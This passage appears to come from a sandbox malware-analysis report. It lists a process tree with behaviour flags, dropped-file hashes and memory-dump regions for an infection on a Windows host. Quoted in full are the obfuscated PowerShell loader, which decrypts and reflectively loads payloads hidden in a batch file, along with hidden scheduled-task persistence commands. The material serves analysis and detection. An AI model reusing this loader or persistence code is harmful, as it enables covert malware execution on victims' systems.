System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var 
(,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_612_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_612.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3276 -
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_612.vbs"
depth: 4
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_612.bat" "
depth: 5
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\net.exe
net file
depth: 6
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 file
depth: 7
PID:2008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_612.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_612.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
depth: 6
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
depth: 7
- Creates scheduled task(s)
PID:4744 -
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
"C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"
depth: 7
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5060 -
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
depth: 8
PID:2768
-
C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
depth: 7
- Executes dropped EXE
PID:244
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
depth: 1
PID:3452
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
depth: 1
PID:3472
-
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
depth: 1
PID:3884
-
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
depth: 1
PID:3948
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
depth: 1
PID:4008
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
depth: 1
PID:4024
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
depth: 1
PID:4268
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
depth: 1
PID:4380
-
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
depth: 1
PID:4868
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
depth: 1
PID:4812
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
depth: 1
PID:4392
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
depth: 1
PID:1348
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
depth: 1
PID:2504
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
depth: 1
- Modifies data under HKEY_USERS
PID:4904
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
depth: 1
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:588
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
depth: 1
PID:3288
-
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
depth: 1
PID:4448
-
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
depth: 1
PID:1908
-
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
depth: 1
PID:3296
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize 2KB
MD5 5dc9a9599fb11ee70f9164d8fea15abf
SHA1 85faf41a206f3fa8b469609333558cf817df2cda
SHA256 3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de
SHA512 499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 17KB
MD5 229c0a92ebbe835620db89a2a51d4e58
SHA1 947e4ea585c39e987e4c4332fcc95ff2e344a000
SHA256 3ec5266144479c44d3dab09d507a1e7cb99d4944bd8b7afbb8e59126233cdf92
SHA512 6fb7bc3237ea9eadc2da39051b737c2caf6ffe58fff0d62ac605e58913c13660ab55142824e8a4be9c3347353bf7c086ee84cd482e810e9fcce2086c1f42343a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4ish412.ebs.ps1
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize 162KB
MD5 152e3f07bbaf88fb8b097ba05a60df6e
SHA1 c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256 a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA512 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
Filesize 411KB
MD5 bc4535f575200446e698610c00e1483d
SHA1 78d990d776f078517696a2415375ac9ebdf5d49a
SHA256 88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122
SHA512 a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717
-
C:\Users\Admin\AppData\Roaming\startup_str_612.bat
Filesize 515KB
MD5 4c2a3be3d5c9464eb441677e41f44fd8
SHA1 c826034a0882d21a39056d745e88622ee9698343
SHA256 45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
SHA512 ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
-
C:\Users\Admin\AppData\Roaming\startup_str_612.vbs
Filesize 115B
MD5 689d28377ba46179472661a33b94321a
SHA1 cfc638246241e4694e364a8c7ffa0e6fef3fe4e6
SHA256 04939dde6dd0a305d7d06ca18eff8f61e801b37234946403594bfe37be72ca29
SHA512 4b4d009d99d9b2a5063596c4ab1aea1ff65e9b512b708a5354f7554be2275884f31dc4839969a1c62fe6f953cebfb1a472f8001a192dcdd51f05c6dc83951ba5
-
memory/436-162-0x00000259D8A20000-0x00000259D8A4B000-memory.dmp  Filesize 172KB
-
memory/436-163-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmp  Filesize 64KB
-
memory/436-156-0x00000259D8A20000-0x00000259D8A4B000-memory.dmp  Filesize 172KB
-
memory/460-167-0x0000027669BA0000-0x0000027669BCB000-memory.dmp  Filesize 172KB
-
memory/480-76-0x0000000004ED0000-0x0000000004EE2000-memory.dmp  Filesize 72KB
-
memory/480-77-0x0000000007740000-0x000000000777C000-memory.dmp  Filesize 240KB
-
memory/480-73-0x0000000007380000-0x00000000073EC000-memory.dmp  Filesize 432KB
-
memory/480-74-0x0000000007490000-0x0000000007522000-memory.dmp  Filesize 584KB
-
memory/644-129-0x000001FD250F0000-0x000001FD2511B000-memory.dmp  Filesize 172KB
-
memory/644-130-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmp  Filesize 64KB
-
memory/644-123-0x000001FD250F0000-0x000001FD2511B000-memory.dmp  Filesize 172KB
-
memory/644-122-0x000001FD250F0000-0x000001FD2511B000-memory.dmp  Filesize 172KB
-
memory/644-121-0x000001FD250C0000-0x000001FD250E5000-memory.dmp  Filesize 148KB
-
memory/700-141-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmp  Filesize 64KB
-
memory/700-134-0x0000024E46D90000-0x0000024E46DBB000-memory.dmp  Filesize 172KB
-
memory/700-140-0x0000024E46D90000-0x0000024E46DBB000-memory.dmp  Filesize 172KB
-
memory/996-152-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmp  Filesize 64KB
-
memory/996-145-0x000002948BDD0000-0x000002948BDFB000-memory.dmp  Filesize 172KB
-
memory/996-151-0x000002948BDD0000-0x000002948BDFB000-memory.dmp  Filesize 172KB
-
memory/1156-108-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1156-118-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1156-114-0x00007FFB1E300000-0x00007FFB1E509000-memory.dmp  Filesize 2.0MB
-
memory/1156-113-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1156-111-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1156-115-0x00007FFB1C9A0000-0x00007FFB1CA5D000-memory.dmp  Filesize 756KB
-
memory/1156-109-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/1156-110-0x0000000140000000-0x0000000140008000-memory.dmp  Filesize 32KB
-
memory/2644-104-0x000002CDEED90000-0x000002CDEEDB2000-memory.dmp  Filesize 136KB
-
memory/2644-106-0x00007FFB1E300000-0x00007FFB1E509000-memory.dmp  Filesize 2.0MB
-
memory/2644-105-0x000002CDEF120000-0x000002CDEF14A000-memory.dmp  Filesize 168KB
-
memory/2644-107-0x00007FFB1C9A0000-0x00007FFB1CA5D000-memory.dmp  Filesize 756KB
-
memory/3276-35-0x0000000074560000-0x0000000074D11000-memory.dmp  Filesize 7.7MB
-
memory/3276-26-0x0000000074560000-0x0000000074D11000-memory.dmp  Filesize 7.7MB
-
memory/3276-36-0x0000000006250000-0x0000000006284000-memory.dmp  Filesize 208KB
-
memory/3276-47-0x0000000006230000-0x000000000624E000-memory.dmp  Filesize 120KB
-
memory/3276-38-0x0000000070750000-0x000000007079C000-memory.dmp  Filesize 304KB
-
memory/3276-25-0x0000000074560000-0x0000000074D11000-memory.dmp  Filesize 7.7MB
-
memory/3276-48-0x0000000006E50000-0x0000000006EF4000-memory.dmp  Filesize 656KB
-
memory/3276-55-0x0000000074560000-0x0000000074D11000-memory.dmp  Filesize 7.7MB
-
memory/3276-49-0x0000000074560000-0x0000000074D11000-memory.dmp  Filesize 7.7MB
-
memory/3276-52-0x00000000071D0000-0x00000000071E1000-memory.dmp  Filesize 68KB
-
memory/3276-51-0x0000000007240000-0x00000000072D6000-memory.dmp  Filesize 600KB
-
memory/3276-50-0x0000000007030000-0x000000000703A000-memory.dmp  Filesize 40KB
-
memory/3276-37-0x0000000074560000-0x0000000074D11000-memory.dmp  Filesize 7.7MB
-
memory/3552-19-0x0000000008070000-0x00000000086EA000-memory.dmp  Filesize 6.5MB
-
memory/3552-16-0x0000000006380000-0x00000000066D7000-memory.dmp  Filesize 3.3MB
-
memory/3552-7-0x0000000006310000-0x0000000006376000-memory.dmp  Filesize 408KB
-
memory/3552-6-0x0000000005B30000-0x0000000005B96000-memory.dmp  Filesize 408KB
-
memory/3552-5-0x0000000005A90000-0x0000000005AB2000-memory.dmp  Filesize 136KB
-
memory/3552-4-0x0000000074560000-0x0000000074D11000-memory.dmp  Filesize 7.7MB
-
memory/3552-3-0x0000000005BF0000-0x000000000621A000-memory.dmp  Filesize 6.2MB
-
memory/3552-2-0x0000000074560000-0x0000000074D11000-memory.dmp  Filesize 7.7MB
-
memory/3552-1-0x0000000003450000-0x0000000003486000-memory.dmp  Filesize 216KB
-
memory/3552-0-0x000000007456E000-0x000000007456F000-memory.dmp  Filesize 4KB
-
memory/3552-17-0x0000000006810000-0x000000000682E000-memory.dmp  Filesize 120KB
-
memory/3552-18-0x00000000068C0000-0x000000000690C000-memory.dmp  Filesize 304KB
-
memory/3552-20-0x0000000006DF0000-0x0000000006E0A000-memory.dmp  Filesize 104KB
-
memory/3552-75-0x0000000074560000-0x0000000074D11000-memory.dmp  Filesize 7.7MB
-
memory/3552-21-0x0000000002FF0000-0x0000000002FF8000-memory.dmp  Filesize 32KB
-
memory/3552-22-0x0000000007A90000-0x0000000007AF2000-memory.dmp  Filesize 392KB
-
memory/3552-23-0x0000000009CA0000-0x000000000A246000-memory.dmp  Filesize 5.6MB
-
memory/5060-95-0x0000000006C50000-0x0000000006C96000-memory.dmp  Filesize 280KB